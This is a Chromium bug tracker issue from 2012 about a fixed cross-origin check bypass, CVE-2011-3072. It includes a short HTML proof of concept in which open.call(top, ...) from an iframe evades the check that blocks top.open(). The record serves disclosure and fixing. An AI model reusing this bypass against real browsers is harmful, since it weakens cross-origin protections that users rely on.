New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner:
Closed: Mar 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 2
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
open.call(other_window) circumvents check in other_window.open()
Project Member Reported by tsepez@chromium.org, Mar 15 2012 Back to list
Small fallout from Pwnium.
Repro'd on 19.0.1061.0 Liunx 64.

<html>
<body>
<button onclick='go()'>click</button>
<script>function go () { top.open('http://youtube.com'); }</script>
<iframe src="data:text/html,<html><body><button onclick='go()'>click</button>                                           
             <script>function go () { top.open('http://youtube.com'); }</script></body></html>">
</iframe>
<iframe src="data:text/html,<html><body><button onclick='go()'>click</button>                                           
             <script>function go () { open.call(top, 'http://youtube.com'); }</script></body></html>">
</iframe>
</body>
</html>

Clicking the first of the iframed buttons blocks top opening a new window with the security error: Unsafe JavaScript attempt to access frame ...
Clicking the second causes it to open.

Possible missing security check in V8DOMWindowCustom.cpp ??

Secseverity really really low.  Would have made Sergey's life more difficult, though.
 
Comment 1 by tsepez@chromium.org, Mar 15 2012
The Safari 5.1.2 does not have the same issue.  Gives an unsafe javascript error in both cases.
Comment 3 by tsepez@chromium.org, Mar 16 2012
Owner: tsepez@chromium.org
Status: Assigned
likely regression from http://trac.webkit.org/changeset/64991/
Comment 4 by cdn@chromium.org, Mar 16 2012
Labels: Mstone-18
Labels: Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/111098

Labels: pwnium
Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged
M18: http://trac.webkit.org/changeset/112461
Labels: CVE-2011-3072
Comment 9 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Labels: -Restrict-View-SecurityNotify
Project Member Comment 11 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 12 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-Low -SecImpacts-Stable -SecImpacts-Beta -Mstone-18 Cr-Content Security-Severity-Low Security-Impact-Stable Security-Impact-Beta M-18 Type-Bug-Security
Project Member Comment 13 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 14 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Low Security_Severity-Low
Project Member Comment 15 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 16 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 17 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 18 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 19 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 20 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment